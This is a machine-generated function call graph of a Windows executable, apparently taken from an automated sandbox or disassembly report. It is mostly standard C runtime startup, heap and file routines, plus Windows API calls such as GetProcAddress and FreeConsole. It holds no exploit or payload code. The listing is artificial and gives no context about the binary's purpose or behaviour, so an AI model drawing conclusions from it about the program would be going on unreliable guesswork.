15580 403ade __EH_prolog3 15579->15580 15581 401030 std::locale::_Locimp::_Locimp 77 API calls 15580->15581 15582 403aeb 15581->15582 15589 403a4b 15582->15589 15585 4052cb __CxxThrowException@8 RaiseException 15586 403b09 15585->15586 15592 401df0 15586->15592 15597 401cf0 15589->15597 15601 4053e9 15592->15601 15598 401cff std::bad_exception::bad_exception 15597->15598 15599 401330 std::bad_exception::bad_exception 77 API calls 15598->15599 15600 401d17 15599->15600 15600->15585 15602 401e03 15601->15602 15603 405409 _strlen 15601->15603 15607 401330 15602->15607 15603->15602 15604 40c3ef _malloc 64 API calls 15603->15604 15605 40541c 15604->15605 15605->15602 15606 40c338 _strcpy_s 64 API calls 15605->15606 15606->15602 15608 401343 _DebugHeapAllocator 15607->15608 15609 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 15608->15609 15610 40134f 15609->15610 15611 401390 std::_Locinfo::_Locinfo_ctor 77 API calls 15610->15611 15612 401364 15611->15612 15612->15565 15616 402730 15613->15616 15617 405582 _memcpy_s 65 API calls 15616->15617 15618 402116 15617->15618 15618->15559 15620 401ae6 std::_Locinfo::_Locinfo_ctor 15619->15620 15627 401e30 15620->15627 15622 401bd9 15624 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 15622->15624 15623 401b53 std::_Locinfo::_Locinfo_ctor 15623->15622 15626 4020f0 std::locale::_Locimp::~_Locimp 65 API calls 15623->15626 15625 401be8 std::locale::_Locimp::~_Locimp 15624->15625 15625->15535 15626->15622 15630 4021e0 15627->15630 15631 4021f5 15630->15631 15632 4021ec 15630->15632 15631->15632 15638 402230 15631->15638 15641 40551d 15632->15641 15637 4052cb __CxxThrowException@8 RaiseException 15637->15632 15653 405379 15638->15653 15642 405527 15641->15642 15643 40c3ef _malloc 64 API calls 15642->15643 15644 401e42 15642->15644 15645 40c4c8 _realloc 7 API calls 15642->15645 15649 405543 std::locale::_Init 15642->15649 15643->15642 15644->15623 15645->15642 15646 405569 15752 402300 15646->15752 15649->15646 15749 407d9d 15649->15749 15650 4052cb __CxxThrowException@8 RaiseException 15652 405581 15650->15652 15654 405392 _strlen 15653->15654 15658 40220c 15653->15658 15659 40c3ef 15654->15659 15658->15637 15660 40c401 15659->15660 15661 40c4a2 15659->15661 15663 40c412 15660->15663 15668 4053a1 15660->15668 15670 40c45e RtlAllocateHeap 15660->15670 15672 40c48e 15660->15672 15675 40c493 15660->15675 15732 40c3a0 15660->15732 15740 40c4c8 15660->15740 15662 40c4c8 _realloc 7 API calls 15661->15662 15664 40c4a8 15662->15664 15663->15660 15686 40dfb8 15663->15686 15695 40de0d 15663->15695 15729 40db59 15663->15729 15666 40a982 __fclose_nolock 63 API calls 15664->15666 15666->15668 15668->15658 15677 40c338 15668->15677 15670->15660 15743 40a982 15672->15743 15676 40a982 __fclose_nolock 63 API calls 15675->15676 15676->15668 15678 40c350 15677->15678 15679 40c349 15677->15679 15680 40a982 __fclose_nolock 64 API calls 15678->15680 15679->15678 15681 40c376 15679->15681 15685 40c355 15680->15685 15683 40c364 15681->15683 15684 40a982 __fclose_nolock 64 API calls 15681->15684 15683->15658 15684->15685 15746 4051fd 15685->15746 15687 41436c __set_error_mode 64 API calls 15686->15687 15688 40dfbf 15687->15688 15689 41436c __set_error_mode 64 API calls 15688->15689 15692 40dfcc 15688->15692 15689->15692 15690 40de0d __NMSG_WRITE 64 API calls 15691 40dfe4 15690->15691 15693 40de0d __NMSG_WRITE 64 API calls 15691->15693 15692->15690 15694 40dfee 15692->15694 15693->15694 15694->15663 15696 40de21 15695->15696 15697 41436c __set_error_mode 61 API calls 15696->15697 15728 40df7c 15696->15728 15698 40de43 15697->15698 15699 40df81 GetStdHandle 15698->15699 15701 41436c __set_error_mode 61 API calls 15698->15701 15700 40df8f _strlen 15699->15700 15699->15728 15704 40dfa8 WriteFile 15700->15704 15700->15728 15702 40de54 15701->15702 15702->15699 15703 40de66 15702->15703 15705 40c338 _strcpy_s 61 API calls 15703->15705 15703->15728 15704->15728 15706 40de88 15705->15706 15707 40de9c GetModuleFileNameA 15706->15707 15708 4050d5 __invoke_watson 10 API calls 15706->15708 15709 40deba 15707->15709 15713 40dedd _strlen 15707->15713 15710 40de99 15708->15710 15711 40c338 _strcpy_s 61 API calls 15709->15711 15710->15707 15712 40deca 15711->15712 15712->15713 15714 4050d5 __invoke_watson 10 API calls 15712->15714 15716 4113df ___getlocaleinfo 61 API calls 15713->15716 15725 40df20 15713->15725 15714->15713 15715 41136b _strcat_s 61 API calls 15717 40df33 15715->15717 15719 40df0d 15716->15719 15720 4050d5 __invoke_watson 10 API calls 15717->15720 15723 40df44 15717->15723 15718 41136b _strcat_s 61 API calls 15721 40df58 15718->15721 15722 4050d5 __invoke_watson 10 API calls 15719->15722 15719->15725 15720->15723 15724 40df69 15721->15724 15726 4050d5 __invoke_watson 10 API calls 15721->15726 15722->15725 15723->15718 15727 414203 ___crtMessageBoxW 18 API calls 15724->15727 15725->15715 15726->15724 15727->15728 15728->15663 15730 40db2e ___crtCorExitProcess GetModuleHandleW GetProcAddress 15729->15730 15731 40db66 ExitProcess 15730->15731 15733 40c3ac _fgetc 15732->15733 15734 40c3dd _fgetc 15733->15734 15735 40c69c __lock 64 API calls 15733->15735 15734->15660 15736 40c3c2 15735->15736 15737 40ceae ___sbh_alloc_block 5 API calls 15736->15737 15738 40c3cd 15737->15738 15739 40c3e6 _malloc LeaveCriticalSection 15738->15739 15739->15734 15741 40bc23 __decode_pointer 7 API calls 15740->15741 15742 40c4d8 15741->15742 15742->15660 15744 40bdf6 __getptd_noexit 64 API calls 15743->15744 15745 40a987 15744->15745 15745->15675 15747 40bc23 __decode_pointer 7 API calls 15746->15747 15748 40520d __invoke_watson 15747->15748 15755 407d61 15749->15755 15751 407daa 15751->15646 15753 4053e9 std::exception::exception 64 API calls 15752->15753 15754 402313 15753->15754 15754->15650 15756 407d6d _fgetc 15755->15756 15763 40db71 15756->15763 15762 407d8e _fgetc 15762->15751 15764 40c69c __lock 64 API calls 15763->15764 15765 407d72 15764->15765 15766 407c76 15765->15766 15767 40bc23 __decode_pointer 7 API calls 15766->15767 15768 407c8a 15767->15768 15769 40bc23 __decode_pointer 7 API calls 15768->15769 15770 407c9a 15769->15770 15771 407d1d 15770->15771 15772 40fd96 __msize 65 API calls 15770->15772 15783 407d97 15771->15783 15777 407cb8 15772->15777 15773 407d04 15774 40bba8 __encode_pointer 7 API calls 15773->15774 15775 407d12 15774->15775 15778 40bba8 __encode_pointer 7 API calls 15775->15778 15776 407cdc 15776->15771 15780 40a8f2 __realloc_crt 74 API calls 15776->15780 15781 407cf2 15776->15781 15777->15773 15777->15776 15779 40a8f2 __realloc_crt 74 API calls 15777->15779 15778->15771 15779->15776 15780->15781 15781->15771 15782 40bba8 __encode_pointer 7 API calls 15781->15782 15782->15773 15784 40db7a _AtModuleExit LeaveCriticalSection 15783->15784 15785 407d9c 15784->15785 15785->15762 15789 402b2e 15786->15789 15790 402b45 15789->15790 15792 402b73 15790->15792 15793 405223 15790->15793 15792->15449 15794 4051fd __fclose_nolock 7 API calls 15793->15794 15795 40522f 15794->15795 15795->15792 15797 404988 15796->15797 15798 4049b7 15797->15798 15799 4049af __VEC_memcpy 15797->15799 15798->15456 15799->15798 15801 402129 std::locale::_Locimp::~_Locimp 15800->15801 15804 402750 15801->15804 15807 402770 15804->15807 15810 406ed3 15807->15810 15809 402146 15809->15472 15811 406ee3 15810->15811 15815 406efc _memmove_s 15810->15815 15812 406ee8 15811->15812 15816 406f08 15811->15816 15813 40a982 __fclose_nolock 64 API calls 15812->15813 15814 406eed 15813->15814 15818 4051fd __fclose_nolock 7 API calls 15814->15818 15815->15809 15816->15815 15817 40a982 __fclose_nolock 64 API calls 15816->15817 15817->15814 15818->15815 15820 407e9d 15819->15820 15821 407ebf EnterCriticalSection 15819->15821 15820->15821 15822 407ea5 15820->15822 15823 4071cb 15821->15823 15854 40c69c 15822->15854 15823->15484 15845 40eb22 15823->15845 15826 40ea07 15825->15826 15830 40ea24 15825->15830 15827 40a982 __fclose_nolock 64 API calls 15826->15827 15828 40ea0c 15827->15828 15829 4051fd __fclose_nolock 7 API calls 15828->15829 15837 40ea1c 15829->15837 15831 40ea59 15830->15831 15830->15837 15961 40eb54 15830->15961 15833 40eb22 __fileno 64 API calls 15831->15833 15834 40ea6d 15833->15834 15931 4149e4 15834->15931 15836 40ea74 15836->15837 15838 40eb22 __fileno 64 API calls 15836->15838 15837->15487 15839 40ea97 15838->15839 15839->15837 15840 40eb22 __fileno 64 API calls 15839->15840 15841 40eaa3 15840->15841 15841->15837 15842 40eb22 __fileno 64 API calls 15841->15842 15843 40eaaf 15842->15843 15844 40eb22 __fileno 64 API calls 15843->15844 15844->15837 15846 40eb31 15845->15846 15848 4071db 15845->15848 15847 40a982 __fclose_nolock 64 API calls 15846->15847 15849 40eb36 15847->15849 15848->15484 15848->15488 15850 4051fd __fclose_nolock 7 API calls 15849->15850 15850->15848 16180 407efe 15851->16180 15853 407288 15853->15482 15855 40c6b1 15854->15855 15856 40c6c4 EnterCriticalSection 15854->15856 15861 40c5d9 15855->15861 15856->15823 15858 40c6b7 15858->15856 15887 40db05 15858->15887 15862 40c5e5 _fgetc 15861->15862 15863 40c60b 15862->15863 15864 40dfb8 __FF_MSGBANNER 64 API calls 15862->15864 15871 40c61b _fgetc 15863->15871 15894 40a861 15863->15894 15866 40c5fa 15864->15866 15868 40de0d __NMSG_WRITE 64 API calls 15866->15868 15872 40c601 15868->15872 15869 40c63c 15874 40c69c __lock 64 API calls 15869->15874 15870 40c62d 15873 40a982 __fclose_nolock 64 API calls 15870->15873 15871->15858 15875 40db59 _fast_error_exit 3 API calls 15872->15875 15873->15871 15876 40c643 15874->15876 15875->15863 15877 40c677 15876->15877 15878 40c64b 15876->15878 15879 4055ff __crtGetStringTypeA_stat 64 API calls 15877->15879 15900 41302e 15878->15900 15886 40c668 15879->15886 15881 40c656 15881->15886 15904 4055ff 15881->15904 15884 40c662 15885 40a982 __fclose_nolock 64 API calls 15884->15885 15885->15886 15910 40c693 15886->15910 15888 40dfb8 __FF_MSGBANNER 64 API calls 15887->15888 15889 40db0f 15888->15889 15890 40de0d __NMSG_WRITE 64 API calls 15889->15890 15891 40db17 15890->15891 15915 40bc23 TlsGetValue 15891->15915 15897 40a86a 15894->15897 15895 40c3ef _malloc 63 API calls 15895->15897 15896 40a8a0 15896->15869 15896->15870 15897->15895 15897->15896 15898 40a881 Sleep 15897->15898 15899 40a896 15898->15899 15899->15896 15899->15897 15913 40d194 15900->15913 15902 41303a InitializeCriticalSectionAndSpinCount 15903 41307e _fgetc 15902->15903 15903->15881 15905 40560b _fgetc 15904->15905 15906 405687 _fgetc 15905->15906 15907 40565e HeapFree 15905->15907 15906->15884 15907->15906 15908 405671 15907->15908 15909 40a982 __fclose_nolock 63 API calls 15908->15909 15909->15906 15914 40c5c2 LeaveCriticalSection 15910->15914 15912 40c69a 15912->15871 15913->15902 15914->15912 15916 40bc3b 15915->15916 15917 40bc5c GetModuleHandleW 15915->15917 15916->15917 15918 40bc45 TlsGetValue 15916->15918 15919 40bc77 GetProcAddress 15917->15919 15920 40bc6c 15917->15920 15923 40bc50 15918->15923 15922 40bc54 15919->15922 15927 40dad5 15920->15927 15925 40bc87 RtlDecodePointer 15922->15925 15926 40bc8f 15922->15926 15923->15917 15923->15922 15925->15926 15926->15856 15928 40dae0 Sleep GetModuleHandleW 15927->15928 15929 40bc72 15928->15929 15930 40dafe 15928->15930 15929->15919 15929->15926 15930->15928 15930->15929 15932 4149f0 _fgetc 15931->15932 15933 414a13 15932->15933 15934 4149f8 15932->15934 15935 414a21 15933->15935 15940 414a62 15933->15940 16043 40a995 15934->16043 15937 40a995 __read_nolock 64 API calls 15935->15937 15939 414a26 15937->15939 15942 40a982 __fclose_nolock 64 API calls 15939->15942 15943 414a83 15940->15943 15944 414a6f 15940->15944 15941 40a982 __fclose_nolock 64 API calls 15951 414a05 _fgetc 15941->15951 15946 414a2d 15942->15946 15964 414e08 15943->15964 15947 40a995 __read_nolock 64 API calls 15944->15947 15954 4051fd __fclose_nolock 7 API calls 15946->15954 15948 414a74 15947->15948 15950 40a982 __fclose_nolock 64 API calls 15948->15950 15949 414a89 15952 414a96 15949->15952 15953 414aac 15949->15953 15950->15946 15951->15836 15974 414422 15952->15974 15956 40a982 __fclose_nolock 64 API calls 15953->15956 15954->15951 15958 414ab1 15956->15958 15957 414aa4 16046 414ad7 15957->16046 15959 40a995 __read_nolock 64 API calls 15958->15959 15959->15957 15962 40a861 __malloc_crt 64 API calls 15961->15962 15963 40eb69 15962->15963 15963->15831 15965 414e14 _fgetc 15964->15965 15966 414e6f 15965->15966 15969 40c69c __lock 64 API calls 15965->15969 15967 414e91 _fgetc 15966->15967 15968 414e74 EnterCriticalSection 15966->15968 15967->15949 15968->15967 15970 414e40 15969->15970 15971 41302e __ioinit InitializeCriticalSectionAndSpinCount 15970->15971 15973 414e57 15970->15973 15971->15973 16049 414e9f 15973->16049 15975 414459 15974->15975 15976 41443e 15974->15976 15977 414468 15975->15977 15979 41448f 15975->15979 15978 40a995 __read_nolock 64 API calls 15976->15978 15980 40a995 __read_nolock 64 API calls 15977->15980 15981 414443 15978->15981 15983 4144ae 15979->15983 15994 4144c2 15979->15994 15982 41446d 15980->15982 15984 40a982 __fclose_nolock 64 API calls 15981->15984 15986 40a982 __fclose_nolock 64 API calls 15982->15986 15987 40a995 __read_nolock 64 API calls 15983->15987 15995 41444b 15984->15995 15985 41451a 15989 40a995 __read_nolock 64 API calls 15985->15989 15988 414474 15986->15988 15990 4144b3 15987->15990 15991 4051fd __fclose_nolock 7 API calls 15988->15991 15992 41451f 15989->15992 15993 40a982 __fclose_nolock 64 API calls 15990->15993 15991->15995 15996 40a982 __fclose_nolock 64 API calls 15992->15996 15997 4144ba 15993->15997 15994->15985 15994->15995 15998 4144f6 15994->15998 16000 41453b 15994->16000 15995->15957 15996->15997 15999 4051fd __fclose_nolock 7 API calls 15997->15999 15998->15985 16003 414501 ReadFile 15998->16003 15999->15995 16002 40a861 __malloc_crt 64 API calls 16000->16002 16004 414551 16002->16004 16005 4149a8 GetLastError 16003->16005 16006 41462d 16003->16006 16009 414577 16004->16009 16010 414559 16004->16010 16007 4149b5 16005->16007 16008 41482e 16005->16008 16006->16005 16013 414641 16006->16013 16011 40a982 __fclose_nolock 64 API calls 16007->16011 16024 4147b3 16008->16024 16063 40a9a8 16008->16063 16053 4131dd 16009->16053 16012 40a982 __fclose_nolock 64 API calls 16010->16012 16015 4149ba 16011->16015 16016 41455e 16012->16016 16022 414873 16013->16022 16023 41465d 16013->16023 16013->16024 16019 40a995 __read_nolock 64 API calls 16015->16019 16020 40a995 __read_nolock 64 API calls 16016->16020 16019->16024 16020->15995 16021 4055ff __crtGetStringTypeA_stat 64 API calls 16021->15995 16022->16024 16026 4148eb ReadFile 16022->16026 16025 4146c3 ReadFile 16023->16025 16033 414740 16023->16033 16024->15995 16024->16021 16029 4146e1 GetLastError 16025->16029 16032 4146eb 16025->16032 16027 41490a GetLastError 16026->16027 16034 414914 16026->16034 16027->16022 16027->16034 16028 414804 MultiByteToWideChar 16028->16024 16030 414828 GetLastError 16028->16030 16029->16023 16029->16032 16030->16008 16031 4147ae 16035 40a982 __fclose_nolock 64 API calls 16031->16035 16032->16023 16037 4131dd __lseeki64_nolock 66 API calls 16032->16037 16033->16024 16033->16031 16036 4147bb 16033->16036 16040 414778 16033->16040 16034->16022 16038 4131dd __lseeki64_nolock 66 API calls 16034->16038 16035->16024 16039 4147f2 16036->16039 16036->16040 16037->16032 16038->16034 16041 4131dd __lseeki64_nolock 66 API calls 16039->16041 16040->16028 16042 414801 16041->16042 16042->16028 16081 40bdf6 GetLastError 16043->16081 16045 40a99a 16045->15941 16179 414ea8 LeaveCriticalSection 16046->16179 16048 414adf 16048->15951 16052 40c5c2 LeaveCriticalSection 16049->16052 16051 414ea6 16051->15966 16052->16051 16068 414d91 16053->16068 16055 4131fb 16056 413203 16055->16056 16057 413214 SetFilePointer 16055->16057 16058 40a982 __fclose_nolock 64 API calls 16056->16058 16059 41322c GetLastError 16057->16059 16061 413208 16057->16061 16058->16061 16060 413236 16059->16060 16059->16061 16062 40a9a8 __dosmaperr 64 API calls 16060->16062 16061->16003 16062->16061 16064 40a995 __read_nolock 64 API calls 16063->16064 16065 40a9b3 _realloc 16064->16065 16066 40a982 __fclose_nolock 64 API calls 16065->16066 16067 40a9c6 16066->16067 16067->16024 16069 414db6 16068->16069 16070 414d9e 16068->16070 16072 40a995 __read_nolock 64 API calls 16069->16072 16077 414dfb 16069->16077 16071 40a995 __read_nolock 64 API calls 16070->16071 16073 414da3 16071->16073 16074 414de4 16072->16074 16075 40a982 __fclose_nolock 64 API calls 16073->16075 16076 40a982 __fclose_nolock 64 API calls 16074->16076 16078 414dab 16075->16078 16079 414deb 16076->16079 16077->16055 16078->16055 16080 4051fd __fclose_nolock 7 API calls 16079->16080 16080->16077 16095 40bc9e TlsGetValue 16081->16095 16084 40be63 SetLastError 16084->16045 16087 40bc23 __decode_pointer 7 API calls 16088 40be3b 16087->16088 16089 40be42 16088->16089 16090 40be5a 16088->16090 16106 40bd0f 16089->16106 16092 4055ff __crtGetStringTypeA_stat 61 API calls 16090->16092 16094 40be60 16092->16094 16093 40be4a GetCurrentThreadId 16093->16084 16094->16084 16096 40bcb3 16095->16096 16097 40bcce 16095->16097 16098 40bc23 __decode_pointer 7 API calls 16096->16098 16097->16084 16100 40a8a6 16097->16100 16099 40bcbe TlsSetValue 16098->16099 16099->16097 16102 40a8af 16100->16102 16103 40a8ec 16102->16103 16104 40a8cd Sleep 16102->16104 16124 4123b2 16102->16124 16103->16084 16103->16087 16105 40a8e2 16104->16105 16105->16102 16105->16103 16158 40d194 16106->16158 16108 40bd1b GetModuleHandleW 16109 40bd31 16108->16109 16110 40bd2b 16108->16110 16112 40bd49 GetProcAddress GetProcAddress 16109->16112 16113 40bd6d 16109->16113 16111 40dad5 __crt_waiting_on_module_handle 2 API calls 16110->16111 16111->16109 16112->16113 16114 40c69c __lock 60 API calls 16113->16114 16115 40bd8c InterlockedIncrement 16114->16115 16159 40bde4 16115->16159 16118 40c69c __lock 60 API calls 16119 40bdad 16118->16119 16162 408e95 InterlockedIncrement 16119->16162 16121 40bdcb 16174 40bded 16121->16174 16123 40bdd8 _fgetc 16123->16093 16125 4123be _fgetc 16124->16125 16126 4123d6 16125->16126 16135 4123f5 _memset 16125->16135 16127 40a982 __fclose_nolock 63 API calls 16126->16127 16128 4123db 16127->16128 16129 4051fd __fclose_nolock 7 API calls 16128->16129 16131 4123eb _fgetc 16129->16131 16130 412467 RtlAllocateHeap 16130->16135 16131->16102 16132 40c4c8 _realloc 7 API calls 16132->16135 16133 40c69c __lock 63 API calls 16133->16135 16135->16130 16135->16131 16135->16132 16135->16133 16137 40ceae 16135->16137 16143 4124ae 16135->16143 16138 40cedc 16137->16138 16139 40cf75 16138->16139 16142 40cf7e 16138->16142 16146 40ca15 16138->16146 16139->16142 16153 40cac5 16139->16153 16142->16135 16157 40c5c2 LeaveCriticalSection 16143->16157 16145 4124b5 16145->16135 16147 40ca28 HeapReAlloc 16146->16147 16148 40ca5c HeapAlloc 16146->16148 16149 40ca46 16147->16149 16151 40ca4a 16147->16151 16148->16149 16150 40ca7f VirtualAlloc 16148->16150 16149->16139 16150->16149 16152 40ca99 HeapFree 16150->16152 16151->16148 16152->16149 16154 40cadc VirtualAlloc 16153->16154 16156 40cb23 16154->16156 16156->16142 16157->16145 16158->16108 16177 40c5c2 LeaveCriticalSection 16159->16177 16161 40bda6 16161->16118 16163 408eb3 InterlockedIncrement 16162->16163 16164 408eb6 16162->16164 16163->16164 16165 408ec0 InterlockedIncrement 16164->16165 16166 408ec3 16164->16166 16165->16166 16167 408ed0 16166->16167 16168 408ecd InterlockedIncrement 16166->16168 16169 408eda InterlockedIncrement 16167->16169 16171 408edd 16167->16171 16168->16167 16169->16171 16170 408ef6 InterlockedIncrement 16170->16171 16171->16170 16172 408f06 InterlockedIncrement 16171->16172 16173 408f11 InterlockedIncrement 16171->16173 16172->16171 16173->16121 16178 40c5c2 LeaveCriticalSection 16174->16178 16176 40bdf4 16176->16123 16177->16161 16178->16176 16179->16048 16181 407f2e LeaveCriticalSection 16180->16181 16182 407f0f 16180->16182 16181->15853 16182->16181 16183 407f16 16182->16183 16186 40c5c2 LeaveCriticalSection 16183->16186 16185 407f2b 16185->15853 16186->16185 16190 4054f7 16187->16190 16189 401a60 16189->15493 16191 4055ff _fgetc 16190->16191 16192 40565e HeapFree 16191->16192 16193 405687 _fgetc 16191->16193 16192->16193 16194 405671 16192->16194 16193->16189 16195 40a982 __fclose_nolock 64 API calls 16194->16195 16195->16193 16197 4073a6 16196->16197 16199 40741f 16196->16199 16198 40eb22 __fileno 64 API calls 16197->16198 16203 4073ac 16198->16203 16200 40eb54 __getbuf 64 API calls 16199->16200 16201 407417 16199->16201 16200->16201 16207 4074ef 16201->16207 16202 407400 16204 40a982 __fclose_nolock 64 API calls 16202->16204 16203->16199 16203->16202 16205 407405 16204->16205 16206 4051fd __fclose_nolock 7 API calls 16205->16206 16206->16201 16208 407efe _ungetc 2 API calls 16207->16208 16209 4074f7 16208->16209 16209->15509 16210 406f59 16211 406f65 _fgetc 16210->16211 16245 40c4f0 HeapCreate 16211->16245 16213 406fc2 16247 40bfb8 GetModuleHandleW 16213->16247 16218 406fd3 __RTC_Initialize 16281 40e5bb 16218->16281 16219 406f30 _fast_error_exit 64 API calls 16219->16218 16221 406fe2 16222 406fee GetCommandLineA 16221->16222 16223 40db05 __amsg_exit 64 API calls 16221->16223 16296 40e484 16222->16296 16225 406fed 16223->16225 16225->16222 16229 407013 16333 40e151 16229->16333 16231 40db05 __amsg_exit 64 API calls 16231->16229 16233 407024 16348 40dbc4 16233->16348 16234 40db05 __amsg_exit 64 API calls 16234->16233 16236 40702c 16237 407037 16236->16237 16238 40db05 __amsg_exit 64 API calls 16236->16238 16354 41cfc0 16237->16354 16238->16237 16240 407054 16241 407066 16240->16241 16437 40dd75 16240->16437 16448 40dda1 16241->16448 16244 40706b _fgetc 16246 406fb6 16245->16246 16246->16213 16440 406f30 16246->16440 16248 40bfd3 16247->16248 16249 40bfcc 16247->16249 16251 40c13b 16248->16251 16252 40bfdd GetProcAddress GetProcAddress GetProcAddress GetProcAddress 16248->16252 16250 40dad5 __crt_waiting_on_module_handle 2 API calls 16249->16250 16253 40bfd2 16250->16253 16474 40bcd2 16251->16474 16254 40c026 TlsAlloc 16252->16254 16253->16248 16257 406fc8 16254->16257 16258 40c074 TlsSetValue 16254->16258 16257->16218 16257->16219 16258->16257 16259 40c085 16258->16259 16451 40ddbf 16259->16451 16264 40bba8 __encode_pointer 7 API calls 16265 40c0a5 16264->16265 16266 40bba8 __encode_pointer 7 API calls 16265->16266 16267 40c0b5 16266->16267 16268 40bba8 __encode_pointer 7 API calls 16267->16268 16269 40c0c5 16268->16269 16470 40c520 16269->16470 16272 40bc23 __decode_pointer 7 API calls 16273 40c0e6 16272->16273 16273->16251 16274 40a8a6 __calloc_crt 64 API calls 16273->16274 16275 40c0ff 16274->16275 16275->16251 16276 40bc23 __decode_pointer 7 API calls 16275->16276 16277 40c119 16276->16277 16277->16251 16278 40c120 16277->16278 16279 40bd0f __getptd_noexit 64 API calls 16278->16279 16280 40c128 GetCurrentThreadId 16279->16280 16280->16257 16491 40d194 16281->16491 16283 40e5c7 GetStartupInfoA 16284 40a8a6 __calloc_crt 64 API calls 16283->16284 16292 40e5e8 16284->16292 16285 40e806 _fgetc 16285->16221 16286 40e783 GetStdHandle 16291 40e74d 16286->16291 16287 40e7e8 SetHandleCount 16287->16285 16288 40a8a6 __calloc_crt 64 API calls 16288->16292 16289 40e795 GetFileType 16289->16291 16290 40e6d0 16290->16285 16290->16291 16294 40e6f9 GetFileType 16290->16294 16295 41302e __ioinit InitializeCriticalSectionAndSpinCount 16290->16295 16291->16285 16291->16286 16291->16287 16291->16289 16293 41302e __ioinit InitializeCriticalSectionAndSpinCount 16291->16293 16292->16285 16292->16288 16292->16290 16292->16291 16293->16291 16294->16290 16295->16290 16297 40e4c1 16296->16297 16298 40e4a2 GetEnvironmentStringsW 16296->16298 16300 40e4aa 16297->16300 16301 40e55a 16297->16301 16299 40e4b6 GetLastError 16298->16299 16298->16300 16299->16297 16302 40e4ec WideCharToMultiByte 16300->16302 16303 40e4dd GetEnvironmentStringsW 16300->16303 16304 40e563 GetEnvironmentStrings 16301->16304 16305 406ffe 16301->16305 16308 40e520 16302->16308 16309 40e54f FreeEnvironmentStringsW 16302->16309 16303->16302 16303->16305 16304->16305 16306 40e573 16304->16306 16322 40e3c9 16305->16322 16310 40a861 __malloc_crt 64 API calls 16306->16310 16311 40a861 __malloc_crt 64 API calls 16308->16311 16309->16305 16312 40e58d 16310->16312 16313 40e526 16311->16313 16314 40e5a0 16312->16314 16315 40e594 FreeEnvironmentStringsA 16312->16315 16313->16309 16316 40e52e WideCharToMultiByte 16313->16316 16317 404970 ___crtGetEnvironmentStringsA __VEC_memcpy 16314->16317 16315->16305 16318 40e540 16316->16318 16319 40e548 16316->16319 16320 40e5aa FreeEnvironmentStringsA 16317->16320 16321 4055ff __crtGetStringTypeA_stat 64 API calls 16318->16321 16319->16309 16320->16305 16321->16319 16323 40e3e3 GetModuleFileNameA 16322->16323 16324 40e3de 16322->16324 16326 40e40a 16323->16326 16498 41134d 16324->16498 16492 40e22f 16326->16492 16329 40a861 __malloc_crt 64 API calls 16330 40e44c 16329->16330 16331 40e22f _parse_cmdline 74 API calls 16330->16331 16332 407008 16330->16332 16331->16332 16332->16229 16332->16231 16334 40e15a 16333->16334 16335 40e15f _strlen 16333->16335 16336 41134d ___initmbctable 108 API calls 16334->16336 16337 407019 16335->16337 16338 40a8a6 __calloc_crt 64 API calls 16335->16338 16336->16335 16337->16233 16337->16234 16343 40e194 _strlen 16338->16343 16339 40e1f2 16340 4055ff __crtGetStringTypeA_stat 64 API calls 16339->16340 16340->16337 16341 40a8a6 __calloc_crt 64 API calls 16341->16343 16342 40e218 16344 4055ff __crtGetStringTypeA_stat 64 API calls 16342->16344 16343->16337 16343->16339 16343->16341 16343->16342 16345 40c338 _strcpy_s 64 API calls 16343->16345 16346 40e1d9 16343->16346 16344->16337 16345->16343 16346->16343 16909 4050d5 16346->16909 16349 40dbd2 __IsNonwritableInCurrentImage 16348->16349 16918 40b8cc 16349->16918 16351 40dbf0 __initterm_e 16352 407d9d _AtModuleExit 75 API calls 16351->16352 16353 40dc0f __IsNonwritableInCurrentImage __initterm 16351->16353 16352->16353 16353->16236 16355 41d0a8 16354->16355 16356 41d2e3 GetModuleHandleA 16355->16356 16357 41d0b5 16355->16357 16358 41d2f6 GetProcAddress 16356->16358 16365 41d33a 16356->16365 16357->16240 16359 41d314 FreeConsole 16358->16359 16360 41d346 16358->16360 16922 41f6a0 16359->16922 16363 41f6a0 115 API calls 16360->16363 16363->16365 16364 41d36c 16949 4191f0 16364->16949 16932 41d990 16365->16932 16367 41d3fe 16368 41d434 16367->16368 16369 41d414 16367->16369 16371 41f6a0 115 API calls 16368->16371 16370 41f6a0 115 API calls 16369->16370 16372 41d428 16370->16372 16371->16372 16373 41f6a0 115 API calls 16372->16373 16374 41d4a4 16372->16374 16376 41db70 132 API calls 16372->16376 16373->16372 16375 41f6a0 115 API calls 16374->16375 16377 41d522 16375->16377 16376->16372 16960 41db70 16377->16960 16379 41d52c 16380 401000 codecvt 66 API calls 16379->16380 16381 41d53b 16380->16381 16382 41f6a0 115 API calls 16381->16382 16383 41d54a 16382->16383 16973 41f950 16383->16973 16386 41f6a0 115 API calls 16387 41d57b 16386->16387 16990 41fb80 16387->16990 16438 40dc49 _doexit 64 API calls 16437->16438 16439 40dd86 16438->16439 16439->16241 16441 406f43 16440->16441 16442 406f3e 16440->16442 16444 40de0d __NMSG_WRITE 64 API calls 16441->16444 16443 40dfb8 __FF_MSGBANNER 64 API calls 16442->16443 16443->16441 16445 406f4b 16444->16445 16446 40db59 _fast_error_exit 3 API calls 16445->16446 16447 406f55 16446->16447 16447->16213 16449 40dc49 _doexit 64 API calls 16448->16449 16450 40ddac 16449->16450 16450->16244 16485 40bc1a 16451->16485 16453 40ddc7 __init_pointers __initp_misc_winsig 16488 40c1c9 16453->16488 16456 40bba8 __encode_pointer 7 API calls 16457 40c08a 16456->16457 16458 40bba8 TlsGetValue 16457->16458 16459 40bbc0 16458->16459 16460 40bbe1 GetModuleHandleW 16458->16460 16459->16460 16461 40bbca TlsGetValue 16459->16461 16462 40bbf1 16460->16462 16463 40bbfc GetProcAddress 16460->16463 16468 40bbd5 16461->16468 16465 40dad5 __crt_waiting_on_module_handle 2 API calls 16462->16465 16464 40bbd9 16463->16464 16466 40bc14 16464->16466 16467 40bc0c RtlEncodePointer 16464->16467 16469 40bbf7 16465->16469 16466->16264 16467->16466 16468->16460 16468->16464 16469->16463 16469->16466 16471 40c52b 16470->16471 16472 41302e __ioinit InitializeCriticalSectionAndSpinCount 16471->16472 16473 40c0d2 16471->16473 16472->16471 16473->16251 16473->16272 16475 40bce8 16474->16475 16476 40bcdc 16474->16476 16477 40bcfc TlsFree 16475->16477 16479 40bd0a 16475->16479 16478 40bc23 __decode_pointer 7 API calls 16476->16478 16477->16479 16478->16475 16480 40c587 DeleteCriticalSection 16479->16480 16481 40c59f 16479->16481 16482 4055ff __crtGetStringTypeA_stat 64 API calls 16480->16482 16483 40c5bf 16481->16483 16484 40c5b1 DeleteCriticalSection 16481->16484 16482->16479 16483->16257 16484->16481 16486 40bba8 __encode_pointer 7 API calls 16485->16486 